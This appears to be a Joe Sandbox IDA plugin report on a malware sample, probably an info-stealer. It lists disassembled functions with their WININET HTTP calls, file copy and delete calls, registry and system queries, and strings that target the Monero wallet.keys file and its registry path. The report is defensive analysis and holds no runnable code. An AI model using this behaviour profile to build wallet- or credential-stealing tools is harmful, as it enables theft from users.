Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandlememcpy$HeapHttpOpenRequestlstrcat$AllocBinaryConnectCrackCryptFileProcessReadSendString
String ID: ------$"$"$"$--$------$------$------
API String ID: 2633831070-2774362122
Opcode ID: 3699202b8c86c7d7bae2930d23856af2bcc7052f5afe070d448807b924fd9dab
Instruction ID: 5eac6181e64dcc8a416a420aa9bf91bf90c69560f183aa6c55bc1ab780bc5ff6
Opcode Fuzzy Hash: 3699202b8c86c7d7bae2930d23856af2bcc7052f5afe070d448807b924fd9dab
Instruction Fuzzy Hash: 55324375920218ABCB14EBA1DC51FEEB779BF54704F40419EF10662091DF38AB89CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00405610 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493
networkstringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004056A8
StrCmpCA.SHLWAPI(?,02D75648), ref: 004056C3
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405843
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,",00000000,?,02D79D28,00000000,?,02D31B60,00000000,?,0041E0D8), ref: 00405B1E
lstrlen.KERNEL32(00000000), ref: 00405B2F
GetProcessHeap.KERNEL32(00000000,?), ref: 00405B40
HeapAlloc.KERNEL32(00000000), ref: 00405B47
lstrlen.KERNEL32(00000000), ref: 00405B5C
memcpy.MSVCRT ref: 00405B73
lstrlen.KERNEL32(00000000), ref: 00405B85
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00405B9E
memcpy.MSVCRT ref: 00405BAB
lstrlen.KERNEL32(00000000,?,?), ref: 00405BC8
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405BDC
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405BF9
InternetCloseHandle.WININET(00000000), ref: 00405C5D
InternetCloseHandle.WININET(00000000), ref: 00405C6A
HttpOpenRequestA.WININET(00000000,02D75608,?,02D795A8,00000000,00000000,00400100,00000000), ref: 004058A8

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00405C74

Strings

-A, xrefs: 0040566F, 00405D14, 004056F7, 00405700, 0040576E, 004057E5, 004058E3, 00405A24, 00405771, 004057E8, 004058E6, 00405A27
------, xrefs: 004059FC
------, xrefs: 00405746
------, xrefs: 004058BB
", xrefs: 00405985
-A, xrefs: 00405620, 00405D27, 00405623
", xrefs: 00405AC6

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$-A$-A
API String ID: 148854478-602752961
Opcode ID: 20f318af1127fa3fc85e80c7073bb5cfd3b10ea22113a06a73a764af5392ed78
Instruction ID: 38116f3ce93ed53bffdba46f35b2307ef6cb7c9f678a3856a9fc947e80efe624
Opcode Fuzzy Hash: 20f318af1127fa3fc85e80c7073bb5cfd3b10ea22113a06a73a764af5392ed78
Instruction Fuzzy Hash: A0125175920218AACB14EBA1DC95FDEB739BF14304F41429EF10A63091DF386B89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040A030 Relevance: 32.0, APIs: 21, Instructions: 494
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040A362
RtlAllocateHeap.NTDLL(00000000), ref: 0040A369
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A14A

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02D754F8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

lstrcat.KERNEL32(?,00000000), ref: 0040A4AA
lstrcat.KERNEL32(?,0041DA80), ref: 0040A4B9
lstrcat.KERNEL32(?,00000000), ref: 0040A4CC
lstrcat.KERNEL32(?,0041DA84), ref: 0040A4DB
lstrcat.KERNEL32(?,00000000), ref: 0040A4EE
lstrcat.KERNEL32(?,0041DA88), ref: 0040A4FD
lstrcat.KERNEL32(?,00000000), ref: 0040A510
lstrcat.KERNEL32(?,0041DA8C), ref: 0040A51F
lstrcat.KERNEL32(?,00000000), ref: 0040A532
lstrcat.KERNEL32(?,0041DA90), ref: 0040A541
lstrcat.KERNEL32(?,00000000), ref: 0040A554
lstrcat.KERNEL32(?,0041DA94), ref: 0040A563

Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E

lstrcat.KERNEL32(?,00000000), ref: 0040A5AC
lstrcat.KERNEL32(?,0041DA98), ref: 0040A5C6
lstrlen.KERNEL32(?), ref: 0040A605
lstrlen.KERNEL32(?), ref: 0040A614
memset.MSVCRT ref: 0040A65D

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

DeleteFileA.KERNEL32(00000000), ref: 0040A689

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpylstrlen$FileHeapmemset$AllocAllocateCopyDeleteLocalProcessmemcmp
String ID:
API String ID: 2228671196-0
Opcode ID: 7e379cea82dbd82070d166ba97bbe28dc3ceb3c8b6954320ffdeae1ebf685c7b
Instruction ID: c7be15c6cc4abab23e8f274795eadccbdda502ec8511485448b77053ecd04baf
Opcode Fuzzy Hash: 7e379cea82dbd82070d166ba97bbe28dc3ceb3c8b6954320ffdeae1ebf685c7b
Instruction Fuzzy Hash: B0029475900208ABCB14EBA1DC96EEE773ABF14305F11415EF507B6091DF38AE85CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040C640 Relevance: 31.9, APIs: 21, Instructions: 374
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D31B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040C6D3
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040C817
RtlAllocateHeap.NTDLL(00000000), ref: 0040C81E
lstrcat.KERNEL32(?,00000000), ref: 0040C958
lstrcat.KERNEL32(?,0041DBD8), ref: 0040C967
lstrcat.KERNEL32(?,00000000), ref: 0040C97A
lstrcat.KERNEL32(?,0041DBDC), ref: 0040C989
lstrcat.KERNEL32(?,00000000), ref: 0040C99C
lstrcat.KERNEL32(?,0041DBE0), ref: 0040C9AB
lstrcat.KERNEL32(?,00000000), ref: 0040C9BE
lstrcat.KERNEL32(?,0041DBE4), ref: 0040C9CD
lstrcat.KERNEL32(?,00000000), ref: 0040C9E0
lstrcat.KERNEL32(?,0041DBE8), ref: 0040C9EF
lstrcat.KERNEL32(?,00000000), ref: 0040CA02
lstrcat.KERNEL32(?,0041DBEC), ref: 0040CA11
lstrcat.KERNEL32(?,00000000), ref: 0040CA24
lstrcat.KERNEL32(?,0041DBF0), ref: 0040CA33

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02D754F8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

lstrlen.KERNEL32(?), ref: 0040CA7A
lstrlen.KERNEL32(?), ref: 0040CA89
memset.MSVCRT ref: 0040CAD2

Part of subcall function 00417070: StrCmpCA.SHLWAPI(00000000,0041DBD0,0040C8F2,0041DBD0,00000000), ref: 0041708F

DeleteFileA.KERNEL32(00000000), ref: 0040CAFE

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
String ID:
API String ID: 1973479514-0
Opcode ID: 32ba6412fb565d8a1011b08ec77e67a79d3f7f1a06a611df1434b1d0c67e7452
Instruction ID: d19a215fe10c8d685073d70632a82ede6d900fe39af11de2b9913f634a463049
Opcode Fuzzy Hash: 32ba6412fb565d8a1011b08ec77e67a79d3f7f1a06a611df1434b1d0c67e7452
Instruction Fuzzy Hash: B1E15275910208ABCB14EBA1DD96EEE773ABF14305F11415EF107B6091DF38AE85CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404540 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 00404470: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 004044F6
Part of subcall function 00404470: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404506

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004045D5
StrCmpCA.SHLWAPI(?,02D75648), ref: 004045FA
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040477A
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,0041D797,00000000,?,?,00000000,?,",00000000,?,02D756B8), ref: 00404AA8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00404AC4
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00404AD8
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00404B09
InternetCloseHandle.WININET(00000000), ref: 00404B6D
InternetCloseHandle.WININET(00000000), ref: 00404B85
HttpOpenRequestA.WININET(00000000,02D75608,?,02D795A8,00000000,00000000,00400100,00000000), ref: 004047D5

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

InternetCloseHandle.WININET(00000000), ref: 00404B8F

Strings

", xrefs: 004049F3
", xrefs: 004048B2
------, xrefs: 004047E8
------, xrefs: 0040467D
------, xrefs: 00404929

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------
API String ID: 460715078-2180234286
Opcode ID: f33dea5127848ba384777a4dbc49c04e97c3bf8f4462a4ed0d356fd91c921632
Instruction ID: e2fbf7176fc7eb33215a1d8fdd4a82cafc16ed7ff926df7fa74fdc4e30892001
Opcode Fuzzy Hash: f33dea5127848ba384777a4dbc49c04e97c3bf8f4462a4ed0d356fd91c921632
Instruction Fuzzy Hash: F21252769102189ACB14EB91DC92FDEB739AF54308F51419EF10672491DF38AF89CF68

Uniqueness

Uniqueness Score: -1.00%

Function 00414AE0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 179
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

RegOpenKeyExA.KERNEL32(00000000,02D5D1D8,00000000,00020019,00000000,0041D289), ref: 00414B41
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
wsprintfA.USER32 ref: 00414BF6
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
RegCloseKey.ADVAPI32(00000000), ref: 00414C29
RegCloseKey.ADVAPI32(00000000), ref: 00414C36

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Strings

%s\%s, xrefs: 00414BEA
- , xrefs: 00414D40
?, xrefs: 00414B17

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 930de5723faa0400951dee4f27910df841fdc16a3a940316e07c619471dc291e
Instruction ID: fbc8112ab3bfbfb2fdc98052a2813d45c496b4d84dbcb1503bfdf8522ef193f5
Opcode Fuzzy Hash: 930de5723faa0400951dee4f27910df841fdc16a3a940316e07c619471dc291e
Instruction Fuzzy Hash: F1712A7590021C9BDB64DB60DD91FDA77B9BF88304F0086D9A109A6180DF74AFCACF94

Uniqueness

Uniqueness Score: -1.00%

Function 0040F630 Relevance: 19.8, APIs: 13, Instructions: 298
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

strtok_s.MSVCRT ref: 0040F667
strtok_s.MSVCRT ref: 0040FA8F

Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02D754F8,?,0041D8AC,?,00000000), ref: 00416E2B
Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: strtok_s$lstrcpylstrlen
String ID:
API String ID: 348468850-0
Opcode ID: a4fd3b02248a231e93288822094748fbdcfe7038c27ec4d2a69c7b1c07e2e100
Instruction ID: 2b3dd8003c7db60ae6f20250f168b485c10b0cdbdb2f80ad8031a0e3e82ebbeb
Opcode Fuzzy Hash: a4fd3b02248a231e93288822094748fbdcfe7038c27ec4d2a69c7b1c07e2e100
Instruction Fuzzy Hash: B4C1A7B5900619DBCB24EF60DC89FDA7779AF58304F00459EE40DA7191DB34AAC9CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004012D0 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 139
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004012E7

Part of subcall function 00401260: GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
Part of subcall function 00401260: HeapAlloc.KERNEL32(00000000), ref: 0040127B
Part of subcall function 00401260: RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
Part of subcall function 00401260: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
Part of subcall function 00401260: RegCloseKey.ADVAPI32(?), ref: 004012BF

lstrcat.KERNEL32(?,00000000), ref: 0040130F
lstrlen.KERNEL32(?), ref: 0040131C
lstrcat.KERNEL32(?,.keys), ref: 00401337

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012

Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05

Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D31B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286

Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82

CopyFileA.KERNEL32(?,00000000,00000001), ref: 00401425

Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6

Part of subcall function 004093A0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
Part of subcall function 004093A0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
Part of subcall function 004093A0: LocalAlloc.KERNEL32(00000040,?), ref: 00409411
Part of subcall function 004093A0: ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
Part of subcall function 004093A0: LocalFree.KERNEL32('@), ref: 00409470
Part of subcall function 004093A0: CloseHandle.KERNEL32(000000FF), ref: 0040947A

DeleteFileA.KERNEL32(00000000), ref: 004014A9
memset.MSVCRT ref: 004014D0

Part of subcall function 00404DC0: lstrlen.KERNEL32(00000000), ref: 00404E4A
Part of subcall function 00404DC0: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404EBB
Part of subcall function 00404DC0: StrCmpCA.SHLWAPI(?,02D75648), ref: 00404ED9

Strings

.keys, xrefs: 0040132B
SOFTWARE\monero-project\monero-core, xrefs: 004012F5
wallet_path, xrefs: 004012F0
\Monero\wallet.keys, xrefs: 0040134D

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$lstrlen$AllocCloseHeapLocalOpenmemset$CopyCreateDeleteFreeHandleInternetProcessQueryReadSizeSystemTimeValue
String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
API String ID: 330749937-218353709
Opcode ID: aac4f7d6eec6ac4db1ee9e0695c0bfe35040fa64cf83d77a6c1a2760d22fd09b
Instruction ID: 465d6e3be360dc7981781b6de12631b9db2cd28431e3bfe2701297f35846b4c8
Opcode Fuzzy Hash: aac4f7d6eec6ac4db1ee9e0695c0bfe35040fa64cf83d77a6c1a2760d22fd09b
Instruction Fuzzy Hash: DD5123B195021897CB15EB61DD92BED773D9F54304F4041EDB60A62091DE385BC5CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004141C0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 89memoryCOMMON

Download Yara Rule

APIs

GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 004141DF
GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0041421C
GetProcessHeap.KERNEL32(00000000,00000104), ref: 004142A0
HeapAlloc.KERNEL32(00000000), ref: 004142A7
wsprintfA.USER32 ref: 004142DD

Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88

Strings

\, xrefs: 004141FD
:, xrefs: 004141F9
C, xrefs: 004141E9

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: Heap$AllocDirectoryInformationProcessVolumeWindowslstrcpywsprintf
String ID: :$C$\
API String ID: 3790021787-3809124531
Opcode ID: 77a074fb3b9fb54d8c60e731bc2f7662655a64108544cd173689164fc73fd892
Instruction ID: 52054a8b39965f6583c41ffabf349f0ba0ed2356e3a02770a6039194ee1378f4
Opcode Fuzzy Hash: 77a074fb3b9fb54d8c60e731bc2f7662655a64108544cd173689164fc73fd892
Instruction Fuzzy Hash: BA3194B0D00258EBDF20DFA4DC45BEE77B4AF48304F104099F5496B281DB78AAD5CB95

Uniqueness

Uniqueness Score: -1.00%

Function 004093A0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004093CC
GetFileSizeEx.KERNEL32(000000FF,?), ref: 004093F1
LocalAlloc.KERNEL32(00000040,?), ref: 00409411
ReadFile.KERNEL32(000000FF,?,00000000,'@,00000000), ref: 0040943A
LocalFree.KERNEL32('@), ref: 00409470
CloseHandle.KERNEL32(000000FF), ref: 0040947A

Strings

'@, xrefs: 00409426, 00409449, 00409429, 0040946F
'@, xrefs: 004093C3, 00409486

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.000000000044B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000624000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3251060961.0000000000636000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_c4RAHq3BNl.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID: '@$'@
API String ID: 2311089104-345573653
Opcode ID: fd5dbe8c05bbcabb50c9e0c438e92dd2d28f417a834b94666c3240b3ece9347a
Instruction ID: e17ca2bf8fb39da35cf654cfb04ed30359ebe63801e33f8f777122e55a65d6c5
Opcode Fuzzy Hash: fd5dbe8c05bbcabb50c9e0c438e92dd2d28f417a834b94666c3240b3ece9347a
Instruction Fuzzy Hash: 0B31EA74A00209EFDB24DF94C885BAEB7B5BF48314F108169E915A73D0D778AD42CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00414960 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 50memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,00000000,00000000,?,02D77D78,00000000,?,0041D774,00000000,?,00000000,00000000,?,02D78378), ref: 0041496D
HeapAlloc.KERNEL32(00000000), ref: 00414974
GlobalMemoryStatusEx.KERNEL32(00000040), ref: 00414995
__aulldiv.LIBCMT ref: 004149AF
__aulldiv.LIBCMT ref: 004149BD
wsprintfA.USER32 ref: 004149E9

Strings

%d MB, xrefs: 004149E0
@, xrefs: 0041498A

Memory Dump Source

Source File: 00000000.00000002.3251060961.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.3251060961.0000000000448000.00000040.00000001.01000000.00000003.sdmpDownload File
